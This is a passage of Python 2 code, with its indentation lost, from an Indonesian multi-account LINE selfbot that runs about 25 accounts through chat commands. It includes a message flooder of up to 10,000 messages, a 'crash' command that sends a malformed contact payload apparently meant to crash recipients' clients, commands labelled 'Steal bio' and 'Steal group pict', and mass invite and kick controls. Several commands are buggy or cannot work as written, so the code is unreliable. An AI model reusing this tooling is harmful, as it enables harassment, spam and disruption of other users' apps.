profile.statusMessage = string
k11.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k12.getProfile()
profile.statusMessage = string
k12.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k13.getProfile()
profile.statusMessage = string
k13.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k14.getProfile()
profile.statusMessage = string
k14.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k15.getProfile()
profile.statusMessage = string
k15.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k16.getProfile()
profile.statusMessage = string
k16.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k17.getProfile()
profile.statusMessage = string
k17.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k18.getProfile()
profile.statusMessage = string
k18.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k19.getProfile()
profile.statusMessage = string
k19.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k20.getProfile()
profile.statusMessage = string
k20.updateProfile(profile)
cl.sendText(msg.to,"Bio berubah menjadi " + string + "")
#--------------=Finish=----------------
#--------------= SC Ganti nama Owner=--------------
elif "Myname:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Myname:","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = kk.getProfile()
profile.displayName = string
kk.updateProfile(profile)
kk.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = kc.getProfile()
profile.displayName = string
kc.updateProfile(profile)
kc.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = ks.getProfile()
profile.displayName = string
ks.updateProfile(profile)
ks.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k1.getProfile()
profile.displayName = string
k1.updateProfile(profile)
k1.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k2.getProfile()
profile.displayName = string
k2.updateProfile(profile)
k2.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k3.getProfile()
profile.displayName = string
k3.updateProfile(profile)
k3.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k4.getProfile()
profile.displayName = string
k4.updateProfile(profile)
k4.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k5.getProfile()
profile.displayName = string
k5.updateProfile(profile)
k5.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k6.getProfile()
profile.displayName = string
k6.updateProfile(profile)
k6.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k7.getProfile()
profile.displayName = string
k7.updateProfile(profile)
k7.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k8.getProfile()
profile.displayName = string
k8.updateProfile(profile)
k8.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k9.getProfile()
profile.displayName = string
k9.updateProfile(profile)
k9.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k10.getProfile()
profile.displayName = string
k10.updateProfile(profile)
k10.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k11.getProfile()
profile.displayName = string
k11.updateProfile(profile)
k11.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k12.getProfile()
profile.displayName = string
k12.updateProfile(profile)
k12.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k13.getProfile()
profile.displayName = string
k13.updateProfile(profile)
k13.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k14.getProfile()
profile.displayName = string
k14.updateProfile(profile)
k14.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k15.getProfile()
profile.displayName = string
k15.updateProfile(profile)
k15.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k16.getProfile()
profile.displayName = string
k16.updateProfile(profile)
k16.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k17.getProfile()
profile.displayName = string
k17.updateProfile(profile)
k17.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k18.getProfile()
profile.displayName = string
k18.updateProfile(profile)
k18.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k19.getProfile()
profile.displayName = string
k19.updateProfile(profile)
k19.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k20.getProfile()
profile.displayName = string
k20.updateProfile(profile)
k20.sendText(msg.to,"Update Name Menjadi : " + string + "")
#-------------- copy profile----------
elif "Spam " in msg.text:
if msg.from_ in admin and owner:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+ " ","")
tulisan = jmlh * (teks+"\n")
#Keke cantik <3
if txt[1] == "on":
if jmlh <= 10000:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Out of range! ")
elif txt[1] == "off":
if jmlh <= 10000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out of range! ")
#-----------------=Selesai=------------------
elif msg.text in ["Bot?"]: #Ngirim Semua Kontak Bot
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
kk.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
kc.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Dmid}
ks.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Emid}
k1.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Fmid}
k2.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Gmid}
k3.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Hmid}
k4.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Imid}
k5.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Jmid}
k6.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Kmid}
k7.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Lmid}
k8.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Mmid}
k9.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Nmid}
k10.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Omid}
k11.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Pmid}
k12.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Qmid}
k13.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Rmid}
k14.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Smid}
k15.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Tmid}
k16.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Umid}
k17.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Vmid}
k18.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Wmid}
k19.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Xmid}
k20.sendMessage(msg)
#====================================================
elif msg.text.lower() == "crash":
if msg.from_ in owner:
msg.contentType = 13
msg.contentMetadata = {'mid': "u6b34b703cbc5fc83cd1e5b6832a05352',"}
cl.sendMessage(msg)
#====================================================
elif msg.text in ["Me"]:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.from_}
random.choice(KAC).sendMessage(msg)
elif msg.text in ["Gift"]:
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
random.choice(KAC).sendMessage(msg)
elif msg.text in ["All gift"]:
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '12'}
msg.text = None
ki.sendMessage(msg)
kk.sendMessage(msg)
kc.sendMessage(msg)
elif msg.text in ["Cancel","cancel"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
random.choice(KAC).cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No one is inviting")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Op cancel","Bot cancel"]:
if msg.from_ in admin:
if msg.toType == 2:
G = ks.getGroup(msg.to)
if G.invitee is not None:
gInviMids = [contact.mid for contact in G.invitee]
ks.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
ks.sendText(msg.to,"No one is inviting")
else:
ks.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
ks.sendText(msg.to,"Can not be used outside the group")
else:
ks.sendText(msg.to,"Not for use less than group")
#elif "gurl" == msg.text:
#print cl.getGroup(msg.to)
##cl.sendMessage(msg)
elif msg.text in ["Buka qr","Open qr"]:
if msg.from_ in admin:
if msg.toType == 2:
X = random.choice(KAC).getGroup(msg.to)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"QR Sudah Dibuka")
else:
random.choice(KAC).sendText(msg.to,"Sudah Terbuka Plak")
else:
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Can not be used outside the group")
else:
random.choice(KAC).sendText(msg.to,"Not for use less than group")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Admin Yang bisa Gunain Perintah ini.")
elif msg.text in ["Tutup qr","Close qr"]:
if msg.from_ in admin:
if msg.toType == 2:
X = random.choice(KAC).getGroup(msg.to)
X.preventJoinByTicket = True
random.choice(KAC).updateGroup(X)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Kode QR Sudah Di Tutup")
else:
random.choice(KAC).sendText(msg.to,"Sudah Tertutup Plak")
else:
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Can not be used outside the group")
else:
random.choice(KAC).sendText(msg.to,"Not for use less than group")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Admin Yang bisa Gunain Perintah ini.")
elif "jointicket " in msg.text.lower():
rplace=msg.text.lower().replace("jointicket ")
if rplace == "on":
wait["atjointicket"]=True
elif rplace == "off":
wait["atjointicket"]=False
cl.sendText(msg.to,"Auto Join Group by Ticket is %s" % str(wait["atjointicket"]))
elif '/ti/g/' in msg.text.lower():
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(msg.text)
n_links=[]
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
if wait["atjointicket"] == True:
group=cl.findGroupByTicket(ticket_id)
cl.acceptGroupInvitationByTicket(group.mid,ticket_id)
cl.sendText(msg.to,"Sukses join ke grup %s" % str(group.name))
elif "Info Group" == msg.text:
if msg.toType == 2:
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
if ginfo.preventJoinByTicket == True:
QR = "Close"
else:
QR = "Open"
random.choice(KAC).sendText(msg.to,"[Group Name]\n" + "[•]" + str(ginfo.name) + "\n\n[Group ID]\n" + msg.to + "\n\n[Group Creator]\n" + "[•]" + gCreator + "\n\n[Group Status]\n" + "[•]Status QR =>" + QR + "\n\n[Group Picture]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\n\nMembers:" + str(len(ginfo.members)) + "\nPending:" + sinvitee)
else:
random.choice(KAC).sendText(msg.to,"[Group Name]\n" + str(ginfo.name) + "\n\n[Group ID]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\n[Group Status]\nGroup Picture:\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif "My mid" == msg.text:
if msg.from_ in admin:
random.choice(KAC).sendText(msg.to, msg.from_)
elif "Mid Bot" == msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,mid)
ki.sendText(msg.to,Amid)
kk.sendText(msg.to,Bmid)
kc.sendText(msg.to,Cmid)
ks.sendText(msg.to,Dmid)
k1.sendText(msg.to,Emid)
k2.sendText(msg.to,Fmid)
k3.sendText(msg.to,Gmid)
k4.sendText(msg.to,Hmid)
k5.sendText(msg.to,Imid)
k6.sendText(msg.to,Jmid)
k7.sendText(msg.to,Kmid)
k8.sendText(msg.to,Lmid)
k9.sendText(msg.to,Mmid)
k10.sendText(msg.to,Nmid)
k11.sendText(msg.to,Omid)
k12.sendText(msg.to,Pmid)
k13.sendText(msg.to,Qmid)
k14.sendText(msg.to,Rmid)
k15.sendText(msg.to,Smid)
k16.sendText(msg.to,Tmid)
k17.sendText(msg.to,Umid)
k18.sendText(msg.to,Vmid)
k19.sendText(msg.to,Wmid)
k20.sendText(msg.to,Xmid)
#--------------------------------- GIFT -------------------------------------
elif msg.text.lower() in ["gift","Gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '40ed630f-22d2-4ddd-8999-d64cef5e6c7d',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
cl.sendMessage(msg)
#----------------------------------------------------------------------------
elif msg.text in ["Wkwkwk","Wkwk","Wk","wkwkwk","wkwk","wk"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "100",
"STKPKGID": "1",
"STKVER": "100" }
cl.sendMessage(msg)
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hehehe","Hehe","He","hehehe","hehe","he"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "10",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Galau"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "9",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["You"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "7",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hadeuh"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Please"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "4",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Haaa"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "3",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Lol"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "110",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hmmm","Hmm","Hm","hmmm","hmm","hm"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "101",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
elif msg.text in ["Welcome"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "247",
"STKPKGID": "3",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["TL: "]:
if msg.from_ in admin:
tl_text = msg.text.replace("TL: ","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif msg.text in ["Invite:on"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"send contact")
elif msg.text in ["Bot1 rename "]:
if msg.from_ in admin:
string = msg.text.replace("Cn ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"name " + string + " done")
elif msg.text in ["Bot2 rename "]:
if msg.from_ in admin:
string = msg.text.replace("Cv1 rename ","")
if len(string.decode('utf-8')) <= 20:
profile_B = ki.getProfile()
profile_B.displayName = string
ki.updateProfile(profile_B)
ki.sendText(msg.to,"name " + string + " done")
elif msg.text in ["Bot3 rename "]:
if msg.from_ in admin:
string = msg.text.replace("Cv2 rename ","")
if len(string.decode('utf-8')) <= 20:
profile_B = kk.getProfile()
profile_B.displayName = string
kk.updateProfile(profile_B)
kk.sendText(msg.to,"name " + string + " done")
#==================================
#==================================================
elif 'Lyric ' in msg.text.lower():
if msg.from_ in admin:
try:
songname = msg.text.lower().replace('Lyric ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'Lyric Lagu ('
hasil += song[0]
hasil += ')\n\n'
hasil += song[5]
cl.sendText(msg.to, hasil)
except Exception as wak:
cl.sendText(msg.to, str(wak))
elif 'Wiki ' in msg.text.lower():
if msg.from_ in admin:
try:
wiki = msg.text.lower().replace("Wiki ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except:
try:
pesan="Over Text Limit! Please Click link\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except Exception as e:
cl.sendText(msg.to, str(e))
elif msg.text.lower() == 'aq restart':
if msg.from_ in admin:
print "[Command]Like executed"
try:
cl.sendText(msg.to,"Restarting...")
restart_program()
except:
cl.sendText(msg.to,"Please wait")
restart_program()
pass
elif msg.text.lower() == 'Ifconfig':
if msg.from_ in admin:
botKernel = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO NetStat===")
elif msg.text.lower() == 'System':
if msg.from_ in admin:
botKernel = subprocess.Popen(["df","-h"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO SYSTEM===")
elif msg.text.lower() == 'Kernel':
if msg.from_ in admin:
botKernel = subprocess.Popen(["uname","-srvmpio"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO KERNEL===")
elif msg.text.lower() == 'Cpu':
if msg.from_ in admin:
botKernel = subprocess.Popen(["cat","/proc/cpuinfo"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO CPU===")
elif 'Instagram ' in msg.text.lower():
if msg.from_ in admin:
try:
instagram = msg.text.lower().replace("Instagram ","")
html = requests.get('https://www.instagram.com/' + instagram + '/?')
soup = BeautifulSoup(html.text, 'html5lib')
data = soup.find_all('meta', attrs={'property':'og:description'})
text = data[0].get('content').split()
data1 = soup.find_all('meta', attrs={'property':'og:image'})
text1 = data1[0].get('content').split()
user = "Name: " + text[-2] + "\n"
user1 = "Username: " + text[-1] + "\n"
followers = "Followers: " + text[0] + "\n"
following = "Following: " + text[2] + "\n"
post = "Post: " + text[4] + "\n"
link = "Link: " + "https://www.instagram.com/" + instagram
detail = "======INSTAGRAM INFO USER======\n"
details = "\n======INSTAGRAM INFO USER======"
cl.sendText(msg.to, detail + user + user1 + followers + following + post + link + details)
cl.sendImageWithURL(msg.to, text1[0])
except Exception as njer:
cl.sendText(msg.to, str(njer))
elif 'Music ' in msg.text.lower():
if msg.from_ in admin:
try:
songname = msg.text.lower().replace('Music ','')
data = r.text
data = json.loads(data)
for song in data:
hasil = 'This is Your Music\n'
hasil += 'Judul : ' + song[0]
hasil += '\nDurasi : ' + song[1]
hasil += '\nLink Download : ' + song[4]
cl.sendText(msg.to, hasil)
cl.sendText(msg.to, "Please Wait for audio...")
cl.sendAudioWithURL(msg.to, song[3])
except Exception as njer:
cl.sendText(msg.to, str(njer))
elif 'Clean invites' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
random.choice(KAC).cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No one is inviting?")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
#================================================================================
elif 'Clear invites' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
random.choice(KAC).cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled.")
elif 'Link open' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#===========================================================================
elif 'Link close' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#============================================================
elif msg.text.lower() == 'Ginfo':
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
msg.contentType = 13
msg.contentMetadata = {'mid': ginfo.creator.mid}
cl.sendText(msg.to,"[display name]\n" + str(ginfo.name) + "\n[Group Id]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\nmembers:" + str(len(ginfo.members)) + "\nInvitation:" + sinvitee + "")
cl.sendMessage(msg)
#===============================================================
elif 'Group list' in msg.text.lower():
if msg.from_ in admin:
gs = cl.getGroupIdsJoined()
L = "? Groups List ?\n"
for i in gs:
L += "[»] %s \n" % (cl.getGroup(i).name + " | [ " + str(len (cl.getGroup(i).members)) + " ]")
cl.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif "Invite me" in msg.text:
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
for i in gid:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(i,[msg.from_])
cl.sendText(msg.to, "successfully invited you to all groups")
elif "Steal group pict" in msg.text:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendImageWithURL(msg.to,path)
elif "Turn off bots" in msg.text:
if msg.from_ in owner:
try:
import sys
sys.exit()
except:
pass
#==================================================================
elif "Steal bio" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,contact.statusMessage)
except:
cl.sendText(msg.to,contact.statusMessage)
#===========================================================
#=======================================================
elif "T-eng " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-eng ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'en')
cl.sendText(msg.to,trs)
print '[Command] Translate EN'
except Exception as error:
cl.sendText(msg.to,(error))
elif "T-japan " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-japan ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'ja')
cl.sendText(msg.to,trs)
print '[Command] Translate japan'
except Exception as error:
cl.sendText(msg.to,(error))
elif "T-thai " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-thai ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'th')
cl.sendText(msg.to,trs)
print '[Command] Translate thai'
except Exception as error:
cl.sendText(msg.to,(error))
elif "T-id " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-id ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'id')
cl.sendText(msg.to,trs)
print '[Command] Translate ID'
except Exception as error:
cl.sendText(msg.to,(error))
elif "Say " in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("Say ","")
cl.sendText(msg.to,(bctxt))
kk.sendText(msg.to,(bctxt))
kc.sendText(msg.to,(bctxt))
ki.sendText(msg.to,(bctxt))
#==========================================================================
elif msg.text in ["Mode on","mode on"]:
if msg.from_ in admin:
if msg.toType == 2:
X = random.choice(KAC).getGroup(msg.to)
X.preventJoinByTicket = True
random.choice(KAC).updateGroup(X)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Kode QR Sudah Di Tutup")
else:
random.choice(KAC).sendText(msg.to,"Sudah Tertutup Boss")
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Invites has been Rejected")
else:
cl.sendText(msg.to,"?????????")
if wait["Protectgr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
if wait["Protectcancl"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
if wait["Protectjoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"Done")
else:
wait["Protectjoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"done")
if wait["protectionOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
if wait["qr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on")
if msg.to in wait['pname']:
cl.sendText(msg.to,"?????? O?.")
else:
cl.sendText(msg.to,"??????? O?")
wait['pname'][msg.to] = True
wait['pname'][msg.to] = cl.getGroup(msg.to).name
if msg.from_ in admin:
gid = msg.to
autocancel[gid] = "poni"
cl.sendText(msg.to,"??O???? ????????O? O?")
if msg.to in protection:
cl.sendText(msg.to,"??????? Protect ??")
else:
wait["pnharfbot"][msg.to] = cl.getGroup(msg.to).name
f=codecs.open('pnharfbot.json','w','utf-8')
json.dump(wait["pnharfbot"], f, sort_keys=True, indent=4,ensure_ascii=False)
protection.append(msg.to)
cl.sendText(msg.to,"Protect ?????? ??")
if msg.from_ in admin:
if wait["Protectcancel"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Kami Kick")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancel"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Yang Cancel Undangan Kami Kick")
else:
cl.sendText(msg.to,"done")
#==========================================================================
elif msg.text in ["Mode off","mode off"]:
if msg.from_ in admin:
if wait["Protectgr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
if wait["Protectcancl"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
if wait["Protectjoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
else:
